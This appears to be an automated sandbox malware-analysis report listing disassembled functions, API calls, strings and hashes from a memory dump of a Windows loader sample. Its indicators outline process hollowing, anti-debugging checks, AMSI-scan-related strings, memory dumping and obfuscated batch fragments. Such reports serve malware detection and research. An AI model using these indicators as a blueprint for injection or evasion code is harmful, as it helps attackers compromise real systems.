@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 029549CC
SLIsGenuineLocalEx, xrefs: 02959A34
CreateProcessWithLogonW, xrefs: 0295A598
NtCreateSection, xrefs: 0295AAA9

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 2010126900-181751239
Opcode ID: 0e1578918db42d8d70a7800a0aaf14be24fe63a4f00de5343ad375ad7880a1a8
Instruction ID: 16e653f889f5b7e28544dd53fe38bb9c1eb413811b5d9b30e8adebe121c9ffd3
Opcode Fuzzy Hash: 0e1578918db42d8d70a7800a0aaf14be24fe63a4f00de5343ad375ad7880a1a8
Instruction Fuzzy Hash: 1C24F875B101688BDB22EB64DC90EEE73F6BFD4304F1150E1E409AB259DE30AE868F51

Function 02948BA8 Relevance: 47.2, APIs: 3, Strings: 23, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0294881C: LoadLibraryA.KERNEL32(00000000,00000000,02948903), ref: 02948850
Part of subcall function 0294881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02948903), ref: 02948860
Part of subcall function 0294881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02948879
Part of subcall function 0294881C: FreeLibrary.KERNEL32(74B20000,00000000,02992388,Function_000065D8,00000004,02992398,02992388,000186A3,00000040,0299239C,74B20000,00000000,00000000,00000000,00000000,02948903), ref: 029488E3

Part of subcall function 029485D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948660

GetThreadContext.KERNEL32(00000600,02992420,ScanString,029923A4,0294A774,UacInitialize,029923A4,0294A774,ScanBuffer,029923A4,0294A774,ScanBuffer,029923A4,0294A774,UacInitialize,029923A4), ref: 0294943A

Part of subcall function 0294824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482BD

Part of subcall function 029484BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948521

Part of subcall function 029479AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A1F

Part of subcall function 02947CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D6C

SetThreadContext.KERNEL32(00000600,02992420,ScanBuffer,029923A4,0294A774,ScanString,029923A4,0294A774,Initialize,029923A4,0294A774,000005E0,0026DFF8,029924F8,00000004,029924FC), ref: 0294A14F
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000600,00000000,00000600,02992420,ScanBuffer,029923A4,0294A774,ScanString,029923A4,0294A774,Initialize,029923A4,0294A774,000005E0,0026DFF8,029924F8), ref: 0294A15C

Part of subcall function 02948798: LoadLibraryW.KERNEL32(bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize,029923A4,0294A774,UacScan), ref: 029487AC
Part of subcall function 02948798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487C6
Part of subcall function 02948798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize), ref: 02948802

Strings

BCryptVerifySignature, xrefs: 0294A3AB
MiniDumpReadDumpStream, xrefs: 0294A560
NtReadVirtualMemory, xrefs: 0294A458
SLGetLicenseInformation, xrefs: 02949197
sppc, xrefs: 029491AE
advapi32, xrefs: 0294A53D
OpenSession, xrefs: 02948BE1, 02949004, 029490B6, 0294A487, 0294A5CD
dbgcore, xrefs: 0294A551, 0294A565
MiniDumpWriteDump, xrefs: 0294A54C
NtSetSecurityObject, xrefs: 0294A6C7
I_QueryTagInformation, xrefs: 0294A538
UacScan, xrefs: 02948CAB, 02948EC3, 029494BF, 029498BB, 02949A2F, 0294A1D9, 0294A671
BCryptQueryProviderRegistration, xrefs: 0294A3BF
UacInitialize, xrefs: 02948E6A, 029491CB, 0294934A, 0294944E, 0294984A, 029499BE, 0294A168
NtOpenProcess, xrefs: 0294A6DB
ScanString, xrefs: 02948C3A, 02948DE5, 02948F93, 029493BB, 029495A1, 02949728, 02949BB5, 02949D73, 02949EE3, 0294A056, 0294A341, 0294A3EE
aI"a9", xrefs: 029492CD, 02949822, 0294999D, 02949B82, 02949E53
ScanBuffer, xrefs: 02948D04, 02948D8C, 02949127, 0294923C, 029492D9, 02949612, 02949799, 0294992C, 02949B11, 02949C26, 02949DE4, 02949F54, 0294A0C7, 0294A2BB, 0294A4D9, 0294A61F
BCryptRegisterProvider, xrefs: 0294A3D3
bcrypt, xrefs: 0294A3B0, 0294A3C4, 0294A3D8
NtOpenObjectAuditAlarm, xrefs: 0294A46C, 0294A524
ntdll, xrefs: 0294A45D, 0294A471, 0294A529, 0294A6CC, 0294A6E0
Initialize, xrefs: 02948F22, 02949530, 029496B7, 02949AA0, 02949D02, 02949E72, 02949FE5, 0294A24A, 0294A57B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$aI"a9"$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-2922769985
Opcode ID: 8ef1d325626d657f8167de1fc92c407b3e605f7c241010c088aa7145b5e37ba9
Instruction ID: 63df2f7732fec19ab2bba5157a2de1bf9a255bd36629ed9a3fc46ce4b1a533cc
Opcode Fuzzy Hash: 8ef1d325626d657f8167de1fc92c407b3e605f7c241010c088aa7145b5e37ba9
Instruction Fuzzy Hash: 27E20B75E901189FDB22EBA4CCA0EDE73FAAFC5710F1251A1E009AB354DE34AE458F51

Function 02948BA6 Relevance: 47.1, APIs: 3, Strings: 23, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0294881C: LoadLibraryA.KERNEL32(00000000,00000000,02948903), ref: 02948850
Part of subcall function 0294881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02948903), ref: 02948860
Part of subcall function 0294881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02948879
Part of subcall function 0294881C: FreeLibrary.KERNEL32(74B20000,00000000,02992388,Function_000065D8,00000004,02992398,02992388,000186A3,00000040,0299239C,74B20000,00000000,00000000,00000000,00000000,02948903), ref: 029488E3

Part of subcall function 029485D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948660

GetThreadContext.KERNEL32(00000600,02992420,ScanString,029923A4,0294A774,UacInitialize,029923A4,0294A774,ScanBuffer,029923A4,0294A774,ScanBuffer,029923A4,0294A774,UacInitialize,029923A4), ref: 0294943A

Part of subcall function 0294824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482BD

Part of subcall function 029484BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948521

Part of subcall function 029479AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A1F

Strings

BCryptVerifySignature, xrefs: 0294A3AB
MiniDumpReadDumpStream, xrefs: 0294A560
NtReadVirtualMemory, xrefs: 0294A458
SLGetLicenseInformation, xrefs: 02949197
sppc, xrefs: 029491AE
advapi32, xrefs: 0294A53D
OpenSession, xrefs: 02948BE1, 02949004, 029490B6, 0294A487, 0294A5CD
dbgcore, xrefs: 0294A551, 0294A565
MiniDumpWriteDump, xrefs: 0294A54C
NtSetSecurityObject, xrefs: 0294A6C7
I_QueryTagInformation, xrefs: 0294A538
UacScan, xrefs: 02948CAB, 02948EC3, 029494BF, 029498BB, 02949A2F, 0294A1D9, 0294A671
BCryptQueryProviderRegistration, xrefs: 0294A3BF
UacInitialize, xrefs: 02948E6A, 029491CB, 0294934A, 0294944E, 0294A168
NtOpenProcess, xrefs: 0294A6DB
ScanString, xrefs: 02948C3A, 02948DE5, 02948F93, 029493BB, 029495A1, 02949728, 02949BB5, 02949D73, 02949EE3, 0294A056, 0294A341, 0294A3EE
aI"a9", xrefs: 029492CD, 02949822, 0294999D, 02949B82, 02949E53
ScanBuffer, xrefs: 02948D04, 02948D8C, 02949127, 0294923C, 029492D9, 02949612, 02949799, 0294992C, 02949B11, 02949C26, 02949DE4, 02949F54, 0294A0C7, 0294A2BB, 0294A4D9, 0294A61F
BCryptRegisterProvider, xrefs: 0294A3D3
bcrypt, xrefs: 0294A3B0, 0294A3C4, 0294A3D8
NtOpenObjectAuditAlarm, xrefs: 0294A46C, 0294A524
ntdll, xrefs: 0294A45D, 0294A471, 0294A529, 0294A6CC, 0294A6E0
Initialize, xrefs: 02948F22, 02949530, 029496B7, 02949AA0, 02949D02, 02949E72, 02949FE5, 0294A24A, 0294A57B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$aI"a9"$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-2922769985
Opcode ID: b5fcc5f8eec74e86bbbb943bc69b686af5b03829f0dde9ef12d49bd35b0bee48
Instruction ID: daedff992dea60f291b65275ad0ffda749f8664bde4911fc0ad369ed7af945e0
Opcode Fuzzy Hash: b5fcc5f8eec74e86bbbb943bc69b686af5b03829f0dde9ef12d49bd35b0bee48
Instruction Fuzzy Hash: 81E21B74E901189FDB22EBA4CCA0EDE73FAAFC5710F1255A1E009AB354DE34AE458F51

Function 02935A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295E790), ref: 02935A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295E790), ref: 02935AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295E790), ref: 02935AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97

Strings

Software\Borland\Locales, xrefs: 02935AA8, 02935AC6
Software\Borland\Delphi\Locales, xrefs: 02935AE4

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
Instruction ID: 498be6e93397c0fa0d6913514c52d0909adc4e4d6f1cfd776176f0bb4df0c8a9
Opcode Fuzzy Hash: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
Instruction Fuzzy Hash: 32519771A4024C7EFB26D6E4CC46FEF77BDAB4C744F8101A5AA04E61C1D7749A448F60

Function 02948798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize,029923A4,0294A774,UacScan), ref: 029487AC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487C6
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize), ref: 02948802

Part of subcall function 02947CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D6C

Strings

BCryptVerifySignature, xrefs: 029487BF
bcrypt, xrefs: 029487AB

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 1f25106b70d6fd988bbae15f7854399bb9be6b698eca5d38b7217c8bbe2f9df2
Instruction ID: 4317dccb6eeac9a98e3c196c4ee6c39287e45cf41990d3ba3b40d54d034895ae
Opcode Fuzzy Hash: 1f25106b70d6fd988bbae15f7854399bb9be6b698eca5d38b7217c8bbe2f9df2
Instruction Fuzzy Hash: 5CF0AF75E8D214FEE310AB6DAC46F36379CA3C2B36F00092AFA0887280CB7018148B54

Function 0294F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0294F034
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294F046
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294F05D

Strings

KernelBase, xrefs: 0294F02F
CheckRemoteDebuggerPresent, xrefs: 0294F040

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 83f4be4431530981ca7f6cea0e2597aa54e9a46ab22e8f67b9c6eed73de00e5b
Instruction ID: fb358bd8d548391df8c7458a9acace381778eb7b7adb969394183ab3d38cc39f
Opcode Fuzzy Hash: 83f4be4431530981ca7f6cea0e2597aa54e9a46ab22e8f67b9c6eed73de00e5b
Instruction Fuzzy Hash: 7FF02030900208BAEB11B6A88888BDDFBBC9B95328F2403C4A420A20C1EB712690C662

Function 0294DFE4 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294E0B4), ref: 0294E01F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294E0B4), ref: 0294E04F
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294E064
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294E090
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294E099

Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294ED84), ref: 02934C1A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 9ccec9afaa9fc6ac27b53b92f26344899562a0925a72c51ac44c2899fa77b41e
Instruction ID: 301222b0715b2d8ac3181364604097e200cd56d129ece45428900c628433a03f
Opcode Fuzzy Hash: 9ccec9afaa9fc6ac27b53b92f26344899562a0925a72c51ac44c2899fa77b41e
Instruction Fuzzy Hash: FB21C175A50708BAEB11EAE4CC46FDF77BDAB48B00F510461F700F71C0DA74AA058B65

Function 0294E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E86A

Strings

ScanBuffer, xrefs: 0294E7B3
OpenSession, xrefs: 0294E80C
Initialize, xrefs: 0294E75A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 4b3aef2302e50dbcb9bf17f81874c9344c7edf60b8a89edd3829ba61db90036a
Instruction ID: c3ccc16a71a74c2612715aa868eba176adead770644f30ff360ec5e2c1e5ef79
Opcode Fuzzy Hash: 4b3aef2302e50dbcb9bf17f81874c9344c7edf60b8a89edd3829ba61db90036a
Instruction Fuzzy Hash: 1F41F671A10208AFEB02EBA4D881E9EB7FAFFD8710F225475E041A7385DE70AD018F51

Function 0294DF00 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DFD2), ref: 0294DF3F
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DF79
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DFA6
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DFAF

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: a9bfea9a5d7fe6a81bc5bda29f6d3b882b9734483e7e7903342be88335b478b2
